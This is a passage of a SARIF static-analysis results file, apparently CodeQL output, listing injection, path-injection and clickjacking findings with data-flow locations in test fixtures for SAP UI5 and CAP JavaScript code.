.search"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":25,"startColumn":9,"endColumn":14}},"message":{"text":"value"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":26,"startColumn":39,"endColumn":44}},"message":{"text":"value"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":26,"startColumn":18,"endColumn":45}},"message":{"text":"jQuery. ... (value)"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":26,"startColumn":9,"endColumn":15}},"message":{"text":"value1"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":27,"startColumn":20,"endColumn":26}},"message":{"text":"value1"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":25,"startColumn":17,"endColumn":41}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":25,"startColumn":17,"endColumn":41}}}]},{"ruleId":"js/sql-injection","rule":{"id":"js/sql-injection","index":34,"toolComponent":{"index":1}},"message":{"text":"This query string depends on a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":782,"startColumn":18,"endColumn":38}}}],"partialFingerprints":{"primaryLocationLineHash":"e7f0d59b4cbe0ccc:1","primaryLocationStartColumnFingerprint":"11"},"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":782,"startColumn":18,"endColumn":38}},"message":{"text":"user-provided value"}}]},{"ruleId":"js/log-injection","rule":{"id":"js/log-injection","index":99,"toolComponent":{"index":1}},"message":{"text":"Log entry depends on a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":7,"startColumn":18,"endColumn":41}}}],"partialFingerprints":{"primaryLocationLineHash":"be9a18716e55d497:1","primaryLocationStartColumnFingerprint":"13"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":6,"startColumn":17,"endColumn":51}},"message":{"text":"jQuery. ... param\")"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":6,"startColumn":9,"endColumn":14}},"message":{"text":"value"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":7,"startColumn":34,"endColumn":39}},"message":{"text":"value"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":7,"startColumn":18,"endColumn":41}},"message":{"text":"`[INFO] ... value}`"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":6,"startColumn":17,"endColumn":51}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":6,"startColumn":17,"endColumn":51}}}]},{"ruleId":"js/log-injection","rule":{"id":"js/log-injection","index":99,"toolComponent":{"index":1}},"message":{"text":"Log entry depends on a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":15,"startColumn":18,"endColumn":41}}}],"partialFingerprints":{"primaryLocationLineHash":"be9a18716e55d497:2","primaryLocationStartColumnFingerprint":"13"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":13,"startColumn":23,"endColumn":30}},"message":{"text":"req.url"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":13,"startColumn":13,"endColumn":37}},"message":{"text":"url.par ... , true)"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":13,"startColumn":9,"endColumn":10}},"message":{"text":"q"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":14,"startColumn":17,"endColumn":18}},"message":{"text":"q"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":14,"startColumn":9,"endColumn":14}},"message":{"text":"value"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":15,"startColumn":34,"endColumn":39}},"message":{"text":"value"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":15,"startColumn":18,"endColumn":41}},"message":{"text":"`[INFO] ... value}`"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":13,"startColumn":23,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":13,"startColumn":23,"endColumn":30}}}]},{"ruleId":"js/log-injection","rule":{"id":"js/log-injection","index":99,"toolComponent":{"index":1}},"message":{"text":"Log entry depends on a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":24,"startColumn":18,"endColumn":42}}}],"partialFingerprints":{"primaryLocationLineHash":"e197b363f9dc3962:1","primaryLocationStartColumnFingerprint":"13"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":21,"startColumn":23,"endColumn":30}},"message":{"text":"req.url"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":21,"startColumn":13,"endColumn":37}},"message":{"text":"url.par ... , true)"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":21,"startColumn":9,"endColumn":10}},"message":{"text":"q"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":22,"startColumn":17,"endColumn":18}},"message":{"text":"q"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":22,"startColumn":9,"endColumn":14}},"message":{"text":"value"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":23,"startColumn":39,"endColumn":44}},"message":{"text":"value"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":23,"startColumn":18,"endColumn":45}},"message":{"text":"jQuery. ... (value)"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":23,"startColumn":9,"endColumn":15}},"message":{"text":"value1"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":24,"startColumn":34,"endColumn":40}},"message":{"text":"value1"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":24,"startColumn":18,"endColumn":42}},"message":{"text":"`[INFO] ... alue1}`"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":21,"startColumn":23,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":21,"startColumn":23,"endColumn":30}}}]},{"ruleId":"js/log-injection","rule":{"id":"js/log-injection","index":99,"toolComponent":{"index":1}},"message":{"text":"Log entry depends on a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/heuristic-models/tests/Sources/test.js","uriBaseId":"%SRCROOT%","index":3},"region":{"startLine":5,"startColumn":17,"endColumn":33}}}],"partialFingerprints":{"primaryLocationLineHash":"45280b24f3d81287:1","primaryLocationStartColumnFingerprint":"12"},"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/heuristic-models/tests/Sources/test.js","uriBaseId":"%SRCROOT%","index":3},"region":{"startLine":5,"startColumn":17,"endColumn":33}},"message":{"text":"user-provided value"}}]},{"ruleId":"js/ui5-path-injection","rule":{"id":"js/ui5-path-injection","index":0,"toolComponent":{"index":4}},"message":{"text":"The path of a saved file depends on a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":372},"region":{"startLine":17,"startColumn":43,"endColumn":61}}}],"partialFingerprints":{"primaryLocationLineHash":"68e5ff83e2198ff5:1","primaryLocationStartColumnFingerprint":"26"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":378},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"value={/input}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":373},"region":{"startLine":9,"startColumn":17,"endColumn":28}},"message":{"text":"input: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":372},"region":{"startLine":8,"startColumn":23,"endColumn":38}},"message":{"text":"{ type: \"int\" }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":372},"region":{"startLine":17,"startColumn":43,"endColumn":61}},"message":{"text":"oControl.getText()"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":378},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":378},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}}}]},{"ruleId":"js/ui5-path-injection","rule":{"id":"js/ui5-path-injection","index":0,"toolComponent":{"index":4}},"message":{"text":"The path of a saved file depends on a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":381},"region":{"startLine":23,"startColumn":43,"endColumn":55}}}],"partialFingerprints":{"primaryLocationLineHash":"b79de9dff4d8f842:1","primaryLocationStartColumnFingerprint":"26"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":387},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"value={/input}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":383},"region":{"startLine":9,"startColumn":17,"endColumn":28}},"message":{"text":"input: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":381},"region":{"startLine":9,"startColumn":23,"endColumn":41}},"message":{"text":"{ type: \"string\" }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":381},"region":{"startLine":15,"startColumn":29,"endColumn":47}},"message":{"text":"oControl.getText()"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":381},"region":{"startLine":15,"startColumn":21,"endColumn":26}},"message":{"text":"value"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":381},"region":{"startLine":17,"startColumn":53,"endColumn":58}},"message":{"text":"value"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":381},"region":{"startLine":17,"startColumn":46,"endColumn":59}},"message":{"text":"String(value)"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":381},"region":{"startLine":17,"startColumn":36,"endColumn":60}},"message":{"text":"encodeX ... value))"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":381},"region":{"startLine":17,"startColumn":21,"endColumn":33}},"message":{"text":"xssSanitized"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":381},"region":{"startLine":23,"startColumn":43,"endColumn":55}},"message":{"text":"xssSanitized"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":387},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":387},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}}}]},{"ruleId":"js/ui5-path-injection","rule":{"id":"js/ui5-path-injection","index":0,"toolComponent":{"index":4}},"message":{"text":"The path of a saved file depends on a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":390},"region":{"startLine":16,"startColumn":39,"endColumn":67}}}],"partialFingerprints":{"primaryLocationLineHash":"de27f6d546a116e8:1","primaryLocationStartColumnFingerprint":"26"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":394},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"value={/input}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":390},"region":{"startLine":10,"startColumn":17,"endColumn":28}},"message":{"text":"input: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":390},"region":{"startLine":16,"startColumn":39,"endColumn":67}},"message":{"text":"oModel. ... input')"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":394},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":394},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}}}]},{"ruleId":"js/ui5-clickjacking","rule":{"id":"js/ui5-clickjacking","index":1,"toolComponent":{"index":4}},"message":{"text":"Possible clickjacking vulnerability due to missing frame options."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-default-all/index.html","uriBaseId":"%SRCROOT%","index":260},"region":{"startLine":2,"endColumn":16}}}],"partialFingerprints":{"primaryLocationLineHash":"7fe81114896a63c:1","primaryLocationStartColumnFingerprint":"0"}},{"ruleId":"js/ui5-clickjacking","rule":{"id":"js/ui5-clickjacking","index":1,"toolComponent":{"index":4}},"message":{"text":"Possible clickjacking vulnerability due to missing frame options."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/index.html","uriBaseId":"%SRCROOT%","index":403},"region":{"startLine":2,"endColumn":16}}}],"partialFingerprints":{"primaryLocationLineHash":"df700c15dad274b2:1","primaryLocationStartColumnFingerprint":"0"}},{"ruleId":"js/ui5-clickjacking","rule":{"id":"js/ui5-clickjacking","index":1,"toolComponent":{"index":4}},"message":{"text":"Possible clickjacking vulnerability due to window\\[ ... onfig\"\\] being set to `allow`."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-allow-all/index.html","uriBaseId":"%SRCROOT%","index":258},"region":{"startLine":9,"startColumn":9,"endColumn":32}}}],"partialFingerprints":{"primaryLocationLineHash":"6152b8f74a1abdf5:1","primaryLocationStartColumnFingerprint":"0"}},{"ruleId":"js/ui5-clickjacking","rule":{"id":"js/ui5-clickjacking","index":1,"toolComponent":{"index":4}},"message":{"text":"Possible clickjacking vulnerability due to data-sap-ui-frameOptions=allow being set to `allow`."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-allow-all/index.html","uriBaseId":"%SRCROOT%","index":258},"region":{"startLine":28,"startColumn":34,"endColumn":66}}}],"partialFingerprints":{"primaryLocationLineHash":"b01bd23ca3666824:1","primaryLocationStartColumnFingerprint":"25"}},{"ruleId":"js/ui5-log-injection-to-http","rule":{"id":"js/ui5-log-injection-to-http","index":2,"toolComponent":{"index":4}},"message":{"text":"Outbound network request depends on [user-provided](1) log data."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/webapp/utils/LogEntriesToHttp.js","uriBaseId":"%SRCROOT%","index":315},"region":{"startLine":11,"startColumn":19,"endColumn":26}}}],"partialFingerprints":{"primaryLocationLineHash":"83472515fe67207a:1","primaryLocationStartColumnFingerprint":"10"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":316},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"value={/input}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":312},"region":{"startLine":11,"startColumn":11,"endColumn":22}},"message":{"text":"input: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":312},"region":{"startLine":17,"startColumn":21,"endColumn":49}},"message":{"text":"oModel. ... input\")"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":312},"region":{"startLine":17,"startColumn":13,"endColumn":18}},"message":{"text":"input"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":312},"region":{"startLine":18,"startColumn":30,"endColumn":35}},"message":{"text":"input"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/webapp/utils/LogEntriesToHttp.js","uriBaseId":"%SRCROOT%","index":315},"region":{"startLine":7,"startColumn":23,"endColumn":42}},"message":{"text":"Log.getLogEntries()"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/webapp/utils/LogEntriesToHttp.js","uriBaseId":"%SRCROOT%","index":315},"region":{"startLine":7,"startColumn":13,"endColumn":20}},"message":{"text":"message"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/webapp/utils/LogEntriesToHttp.js","uriBaseId":"%SRCROOT%","index":315},"region":{"startLine":11,"startColumn":19,"endColumn":26}},"message":{"text":"message"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":316},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"user-provided"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":316},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}}}]},{"ruleId":"js/ui5-log-injection-to-http","rule":{"id":"js/ui5-log-injection-to-http","index":2,"toolComponent":{"index":4}},"message":{"text":"Outbound network request depends on [user-provided](1) log data."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":321},"region":{"startLine":24,"startColumn":23,"endColumn":40}}}],"partialFingerprints":{"primaryLocationLineHash":"de5157ed7a614f91:1","primaryLocationStartColumnFingerprint":"10"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":325},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"value={/input}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":321},"region":{"startLine":8,"startColumn":11,"endColumn":22}},"message":{"text":"input: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":321},"region":{"startLine":14,"startColumn":21,"endColumn":49}},"message":{"text":"oModel. ... input\")"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":321},"region":{"startLine":14,"startColumn":13,"endColumn":18}},"message":{"text":"input"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":321},"region":{"startLine":17,"startColumn":19,"endColumn":24}},"message":{"text":"input"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":321},"region":{"startLine":20,"startColumn":33,"endColumn":42}},"message":{"text":"oLogEntry"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks